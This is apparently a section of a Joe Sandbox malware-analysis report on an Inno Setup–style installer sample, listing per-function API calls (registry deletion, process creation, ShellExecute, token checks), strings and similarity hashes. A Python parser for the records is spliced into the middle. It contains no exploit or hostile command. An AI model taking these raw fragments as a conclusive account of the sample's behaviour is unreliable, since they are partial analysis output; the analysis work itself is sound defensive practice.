                                                                                      • API String ID: 1959210111-0
                                                                                      • Opcode ID: 5c878ef1f1aeb2db91bf3432714928a7f2f2769f3bd036598b9914e69cbbf5aa
                                                                                      • Instruction ID: 86e626badbabc243afb65fecb2564bdd41232683b3d9035b7095670fd5686afe
                                                                                      • Opcode Fuzzy Hash: 5c878ef1f1aeb2db91bf3432714928a7f2f2769f3bd036598b9914e69cbbf5aa
                                                                                      • Instruction Fuzzy Hash: BA2183313086018ACB20AB69D889AD737F1AF45714F0645ABF8589B392D73DDC86CB59
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(8B500000,00000008,?), ref: 0048FD9D
                                                                                      • MulDiv.KERNEL32(50142444,00000008,?), ref: 0048FDB1
                                                                                      • MulDiv.KERNEL32(F757C3E8,00000008,?), ref: 0048FDC5
                                                                                      • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 0048FDE3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                                      • Instruction ID: 0205f8053e5b888f5c8b1498a92a9aed559835e4432beced00229de2e9d93edf
                                                                                      • Opcode Fuzzy Hash: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                                      • Instruction Fuzzy Hash: 49112172604204ABCB40EEA9C8C4D9B77ECEF4D320B14416AF918DB246D634ED40CBA4
                                                                                      APIs
                                                                                      • GetClassInfoA.USER32(00400000,0041F3E0,?), ref: 0041F411
                                                                                      • UnregisterClassA.USER32(0041F3E0,00400000), ref: 0041F43A
                                                                                      • RegisterClassA.USER32(00494598), ref: 0041F444
                                                                                      • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F47F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                      • String ID:
                                                                                      • API String ID: 4025006896-0
                                                                                      • Opcode ID: d848210eac8fa203de2a57be4a09b5e70b2efef1fc89853c1c9f6bba622f69a5
                                                                                      • Instruction ID: 124ae18f6ccee6cd3f50944003dafe19b4a4e3b77e192b7b2acb4d1f887b2837
                                                                                      • Opcode Fuzzy Hash: d848210eac8fa203de2a57be4a09b5e70b2efef1fc89853c1c9f6bba622f69a5
                                                                                      • Instruction Fuzzy Hash: 390152712401047BCB10EBE8ED81E9B379CA769314B12413BBA05E72E1D6359C164BAD
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D187
                                                                                      • LoadResource.KERNEL32(00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,00477B64,0000000A,REGDLL_EXE), ref: 0040D1A1
                                                                                      • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,00477B64), ref: 0040D1BB
                                                                                      • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?), ref: 0040D1C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 3473537107-0
                                                                                      • Opcode ID: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                                      • Instruction ID: a2e4909c1946fcd89949086e6ecb513f2c22862e5b7fa6f76d970aa484769738
                                                                                      • Opcode Fuzzy Hash: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                                      • Instruction Fuzzy Hash: BEF0FF726056046F9754EE9DA881D5B76ECDE48264320416AF908EB246DE38DD118B78
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0046C50D
                                                                                      Strings
                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 0046C51E
                                                                                      • Unsetting NTFS compression on file: %s, xrefs: 0046C4F3
                                                                                      • Setting NTFS compression on file: %s, xrefs: 0046C4DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                      • API String ID: 1452528299-3038984924
                                                                                      • Opcode ID: 86807cbfd2226bd454e4e46b74c8b92495b6acb580f029ac175535f9750d921d
                                                                                      • Instruction ID: 8a11723362a507f0333bc9965096a3e3adfce4be1f63418e8be67e25eb968b75
                                                                                      • Opcode Fuzzy Hash: 86807cbfd2226bd454e4e46b74c8b92495b6acb580f029ac175535f9750d921d
                                                                                      • Instruction Fuzzy Hash: E1016770E0825866CB04D7ED54812FDBBE49F4D314F84C1EFA499E7243EB791508879B
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,00459E8A,?,?,?,?,?,00000000,00459EB1), ref: 004547C4
                                                                                      • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,00459E8A,?,?,?,?,?,00000000), ref: 004547CD
                                                                                      • RemoveFontResourceA.GDI32(00000000), ref: 004547DA
                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004547EE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                      • String ID:
                                                                                      • API String ID: 4283692357-0
                                                                                      • Opcode ID: 46c8cad0b261e60d48b1d3e67bfe7d27a1d7efb6af96d1f02519370c88f59435
                                                                                      • Instruction ID: 4674671b110c5257b68e85d971ffdb8cda5f86f627ed5b1345ff1e290f3286d1
                                                                                      • Opcode Fuzzy Hash: 46c8cad0b261e60d48b1d3e67bfe7d27a1d7efb6af96d1f02519370c88f59435
                                                                                      • Instruction Fuzzy Hash: A8F05EB575430136EA10B6B69C87F1B228C9F98749F10483BBA00EF2C3DA7CD805962D
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,00000000), ref: 0046BC1D
                                                                                      Strings
                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 0046BC2E
                                                                                      • Setting NTFS compression on directory: %s, xrefs: 0046BBEB
                                                                                      • Unsetting NTFS compression on directory: %s, xrefs: 0046BC03
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                      • API String ID: 1452528299-1392080489
                                                                                      • Opcode ID: 9042e0bba0a45541bb3a6888451997e20af0478713a1f8326d793a8a88ac9600
                                                                                      • Instruction ID: 69529bc4e5d6d07a91d00c664886aea47b6ace433f8fc03d3f3948ef3290ac7a
                                                                                      • Opcode Fuzzy Hash: 9042e0bba0a45541bb3a6888451997e20af0478713a1f8326d793a8a88ac9600
                                                                                      • Instruction Fuzzy Hash: 7B016730D0424866CB04D7AD54416DDBBE4DF4D304F44C1EFA858E7247EB79064887DB
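The function records above (the two NTFS-compression blocks and the registry/font-removal block in particular) are easier to triage across a long report once they are parsed into structured form. The parser below is an added example, not Joe Sandbox code or part of this report: it assumes the record layout visible on this page (a record opens at each "APIs" header, "Part of subcall function" entries mark calls made inside a callee, and the "Download File" link text is fused onto the .sdmp names by extraction), and SAMPLE is constructed from two records copied out of this section with the leading whitespace removed.

```python
"""Parse per-function records of a Joe Sandbox Execution Graph listing (the APIs /
Strings / Memory Dump Source / Similarity blocks in this report) for cross-report triage."""
import re
from dataclasses import dataclass, field

BULLET = "\u2022"
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
RESIDUE = "Download File"  # link text the extracted page fuses onto .sdmp file names
# "Name.MODULE(args), ref: ADDR", the argument-less "GetCursorPos.USER32 ref: ADDR",
# and the "Part of subcall function X:" prefix marking calls made inside a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str                         # call-site address inside the dump
    subcall_of: "str | None" = None  # callee address when the call is indirect

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)     # (text, xref) pairs
    source_file: str = ""
    associated: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)  # "API ID", "Opcode ID", ...

def _match(regex, entry):
    m = regex.match(entry)
    if m is None:
        raise ValueError(f"unrecognised line: {entry!r}")
    return m

def parse_records(text):
    """Split the listing into records; a record opens at each 'APIs' header (layout
    inferred from this report, not from a published format specification)."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
        elif line.startswith(BULLET) and current is not None:
            entry = line[1:].strip()
            if section == "APIs":
                m = _match(API_RE, entry)
                args = m["args"].split(",") if m["args"] is not None else []
                current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
            elif section == "Strings":
                m = _match(STRING_RE, entry)
                current.strings.append((m["text"], m["ref"]))
            else:
                key, _, value = entry.partition(":")
                value = value.strip()
                if value.endswith(RESIDUE):  # drop the fused "Download File" link text
                    value = value[:-len(RESIDUE)].rstrip()
                if key == "Source File":
                    current.source_file = value.split(",")[0]
                elif key == "Associated":
                    current.associated.append(value)
                elif section == "Similarity":
                    current.similarity[key] = value
    return records

def api_index(records):
    """API name -> sorted call sites, counting only calls the function makes directly
    (subcall entries belong to the callee and would otherwise be double counted)."""
    index = {}
    for rec in records:
        for call in rec.apis:
            if call.subcall_of is None:
                index.setdefault(call.name, set()).add(call.ref)
    return {name: sorted(refs) for name, refs in index.items()}

# Constructed input: two records copied from this report section, dedented.
SAMPLE = r"""
APIs
• GetLastError.KERNEL32(?,00000000), ref: 0046C50D
Strings
• Failed to set NTFS compression state (%d)., xrefs: 0046C51E
• Unsetting NTFS compression on file: %s, xrefs: 0046C4F3
• Setting NTFS compression on file: %s, xrefs: 0046C4DB
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
• API String ID: 1452528299-3038984924
• Instruction Fuzzy Hash: E1016770E0825866CB04D7ED54812FDBBE49F4D314F84C1EFA499E7243EB791508879B
APIs
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
• RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,00459E8A,?,?,?,?,?,00000000,00459EB1), ref: 004547C4
• RemoveFontResourceA.GDI32(00000000), ref: 004547DA
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004547EE
Similarity
• API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
• String ID:
"""
```

Running parse_records over a whole listing and then api_index gives one place to look up, for instance, every direct call site of RegDeleteValueA or SendNotifyMessageA; the subcall entries are kept on the record (with the callee address in subcall_of) but excluded from the index, because the same callee is reported under every function that reaches it and would otherwise inflate the counts.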
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: ErrorLast$CountSleepTick
• String ID:
• API String ID: 2227064392-0
• Opcode ID: a2b42f5d817999fa87d8c8debf1c72a2dd1cd4bafa442c689adcebc18bd8fdf0
• Instruction ID: 455298f4415a448e3fa874f92f6781e0756abc36bce73f1148afe723a625cd3c
• Opcode Fuzzy Hash: a2b42f5d817999fa87d8c8debf1c72a2dd1cd4bafa442c689adcebc18bd8fdf0
• Instruction Fuzzy Hash: C3E06D7230DA4446DA3635BF2C866FB4AACCFC6364B28553FE08DD6282C8984C06956A
APIs
• GetCurrentProcess.KERNEL32(00000008,?,0047B594,?,?,00000001,00000000,00000002,00000000,0047BE41,?,?,?,?,?,00493309), ref: 00473941
• OpenProcessToken.ADVAPI32(00000000,00000008,?,0047B594,?,?,00000001,00000000,00000002,00000000,0047BE41), ref: 00473947
• GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,0047B594,?,?,00000001,00000000,00000002,00000000,0047BE41), ref: 00473969
• CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,0047B594,?,?,00000001,00000000,00000002,00000000), ref: 0047397A
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0
• Opcode ID: edfe2e214aa3a75ba4a1892ea1e575a857d4468868b2aecbb613d029d339128d
• Instruction ID: bb68efe843bb787bbe1951a3fb92d0835bf9270be0aaf8c05fbae998de9023db
• Opcode Fuzzy Hash: edfe2e214aa3a75ba4a1892ea1e575a857d4468868b2aecbb613d029d339128d
• Instruction Fuzzy Hash: 94F030A16443016BD600EAB5CD82E9B77DCEB44354F04883A7E98D72D1E678DD18AB26
APIs
• GetLastActivePopup.USER32(?), ref: 004241BC
• IsWindowVisible.USER32(?), ref: 004241CD
• IsWindowEnabled.USER32(?), ref: 004241D7
• SetForegroundWindow.USER32(?), ref: 004241E1
Similarity
• API ID: Window$ActiveEnabledForegroundLastPopupVisible
• String ID:
• API String ID: 2280970139-0
• Opcode ID: fcfbdc667dfc271acfde3df3b5f004a8a61651cac52fe1164ff6abd3c1fed0d2
• Instruction ID: 7a261241521d5f36110480f60a41559dbc21bd8b6604a945fb8666e4bf107b55
• Opcode Fuzzy Hash: fcfbdc667dfc271acfde3df3b5f004a8a61651cac52fe1164ff6abd3c1fed0d2
• Instruction Fuzzy Hash: 0DE08699B06531139E31FA251885ABB25ACCD54B883C60127BC04F7243DF1CCFA0C1AC
APIs
• GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 00467191
• EnableMenuItem.USER32(00000000,00000000,00000000), ref: 00467197
Similarity
• API ID: Menu$EnableItemSystem
• String ID: CurPageChanged
• API String ID: 3692539535-2490978513
• Opcode ID: b1f316c5989fff7e00d37c5493a715d64e5e6d0b5679f88fc60dbd8090725f93
• Instruction ID: 85229a9a86c8d76f9b88dc92849b92cb22f01a3e3c9a9662cd7f180e88e3a99e
• Opcode Fuzzy Hash: b1f316c5989fff7e00d37c5493a715d64e5e6d0b5679f88fc60dbd8090725f93
• Instruction Fuzzy Hash: AFA1F734614204DFC711DB69D985EE973F5EB49308F2640F6F804AB322EB38AE41EB59
APIs
• RtlEnterCriticalSection.KERNEL32(00496420,00000000,004021FC), ref: 004020CB
  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(00496420,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(00496420,00401A89,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Similarity
• API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
• String ID: 0'd
• API String ID: 296031713-1261448102
• Opcode ID: c9e83c2416c2ed5bf47c5d563a835639b46c609bf4dc24c8581f363c33cd1986
• Instruction ID: bee6d1afbc099edcb865eebe2e963010dd73383aa86927e532b05753f0ae9538
• Opcode Fuzzy Hash: c9e83c2416c2ed5bf47c5d563a835639b46c609bf4dc24c8581f363c33cd1986
• Instruction Fuzzy Hash: EF41C4B2E003119FDB10CFA9DE8521A7BB4F7A9364B16417BD854A77E1D3789841CB4C
APIs
• SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FB19
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FB4A
Similarity
• API ID: ExecuteMessageSendShell
• String ID: open
• API String ID: 812272486-2758837156
• Opcode ID: 8a0605ed0c381f0a74a086ec1471ed6555b23fb8dcfb2e81ee34f57c50cf0fe2
• Instruction ID: 724f47e86b4f4745380ee9597168f1c8a72dce230288f2328438c3862ccb2892
• Opcode Fuzzy Hash: 8a0605ed0c381f0a74a086ec1471ed6555b23fb8dcfb2e81ee34f57c50cf0fe2
• Instruction Fuzzy Hash: F8214470E00244AFEB00DF69C992F9EB7F9EF45704F1085BAB500E7391D678BA45CA58
Strings
• Failed to proceed to next wizard page; showing wizard., xrefs: 00468B99
• Failed to proceed to next wizard page; aborting., xrefs: 00468B85
Similarity
• API ID:
• String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
• API String ID: 0-1974262853
• Opcode ID: 922b0376bd45f1a340fb446d45ca7413af626e1e06f02045d5dc725511932721
• Instruction ID: be58dce371fc8eb70e9473287a00680558b91856d3b2c3d5b7f8b6b1509d7c4a
• Opcode Fuzzy Hash: 922b0376bd45f1a340fb446d45ca7413af626e1e06f02045d5dc725511932721
• Instruction Fuzzy Hash: 5C218E706042049FDB00EBA9E985E99B7F8EB05714F2541BFF404AB352DB38AE40CB59
APIs
• ShellExecuteEx.SHELL32(0000003C), ref: 00453D18
• GetLastError.KERNEL32(0000003C,00000000,00453D61,?,?,00000001,00000001), ref: 00453D29
  • Part of subcall function 00453970: WaitForInputIdle.USER32(00000001,00000032), ref: 0045399C
  • Part of subcall function 00453970: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004539BE
  • Part of subcall function 00453970: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 004539CD
  • Part of subcall function 00453970: CloseHandle.KERNEL32(00000001,004539FA,004539F3,?,00000031,00000080,00000000,?,?,00453D4B,00000080,0000003C,00000000,00453D61), ref: 004539ED
Similarity
• API ID: Wait$CloseCodeErrorExecuteExitHandleIdleInputLastMultipleObjectsProcessShell
• String ID: <
• API String ID: 35504260-4251816714
• Opcode ID: 0a489ccbbc1036629311ba8f0fc18be266887183308125755252c1f90736cb03
• Instruction ID: 33ba34e09f30df1b12b73ce0116b213a2e15e307ba7a65c56a6979caf0e15077
• Opcode Fuzzy Hash: 0a489ccbbc1036629311ba8f0fc18be266887183308125755252c1f90736cb03
• Instruction Fuzzy Hash: 3C2153B0600209ABDB11DF65D8826DE7BF8AF09396F50443AF844E7381D7789E49CB98
APIs
• RtlEnterCriticalSection.KERNEL32(00496420,00000000,)), ref: 004025C7
• RtlLeaveCriticalSection.KERNEL32(00496420,0040263D), ref: 00402630
  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(00496420,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(00496420,00401A89,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Similarity
• API ID: CriticalSection$EnterLeave$AllocInitializeLocal
• String ID: )
• API String ID: 2227675388-1084416617
• Opcode ID: 3eb0375ff62f3d3bcca9cc60adac25dafbf9b9e3c2e27b1e4b69ca31af3a3358
• Instruction ID: 5893b1754cd22d93ac955961316eccc987691ebf6da7ca014f8aac44d7effe1a
• Opcode Fuzzy Hash: 3eb0375ff62f3d3bcca9cc60adac25dafbf9b9e3c2e27b1e4b69ca31af3a3358
• Instruction Fuzzy Hash: 851101317042046FEB25ABB99F5A62A6AD4D795758B25087FF404F32D2D9BD8C02826C
APIs
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• SysFreeString.OLEAUT32(?), ref: 00446EFA
Similarity
• API ID: String$AllocByteCharFreeMultiWide
• String ID: NIL Interface Exception$Unknown Method
• API String ID: 3952431833-1023667238
• Opcode ID: 87cbfea59f1259fc6e468aac4867c83fbc8f3f1cc130e6dbee1779124e49575a
• Instruction ID: 5f9b3b73cb94db711a986a3f2247f7757ae34ed1a40e252d8aaeb61a96a19159
• Opcode Fuzzy Hash: 87cbfea59f1259fc6e468aac4867c83fbc8f3f1cc130e6dbee1779124e49575a
• Instruction Fuzzy Hash: 3E1196706042489FEB10DFA5DC52AAEBBBCEB49704F52407AF900E7681D7799D04CA6A
                                                                                      APIs
                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490BFC,?,00490BF0,00000000,00490BD7), ref: 00490BA2
                                                                                      • CloseHandle.KERNEL32(00490C3C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490BFC,?,00490BF0,00000000), ref: 00490BB9
                                                                                        • Part of subcall function 00490A8C: GetLastError.KERNEL32(00000000,00490B24,?,?,?,?), ref: 00490AB0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateErrorHandleLastProcess
                                                                                      • String ID: D
                                                                                      • API String ID: 3798668922-2746444292
                                                                                      • Opcode ID: 248f869aaca6227a9bc77a92f638e1a0db6285b6b497ba8db48b301b6d33914f
                                                                                      • Instruction ID: 99184734163d0c92a4db66637d6494c9b23a30ba7254384d63fd9a46e8a5d762
                                                                                      • Opcode Fuzzy Hash: 248f869aaca6227a9bc77a92f638e1a0db6285b6b497ba8db48b301b6d33914f
                                                                                      • Instruction Fuzzy Hash: 790165B1644248AFDF00EBD1CC42F9FBBACDF48718F51007AB504E7291DA78AE048A58
                                                                                      APIs
                                                                                      • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DBB0
                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DBF0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
